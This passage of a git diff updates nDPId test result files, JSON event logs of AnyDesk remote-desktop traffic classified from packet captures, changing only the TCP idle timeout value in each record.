{"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -01202{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2064,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":223587,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01300{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 
+01202{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2064,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":223587,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":2521,"packets-processed":2083,"total-skipped-flows":0,"total-l4-data-len":227127,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":905,"global_ts_msec":1613977618224} diff --git a/test/results/anydesk.pcap.out b/test/results/anydesk.pcap.out index 2a1d2ef4e..d2b63fab1 100644 --- a/test/results/anydesk.pcap.out +++ b/test/results/anydesk.pcap.out 
@@ -1,19 +1,19 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anydesk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591342198821} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} -00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} 
-01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} -00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} +00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} 
+01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} +00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}} 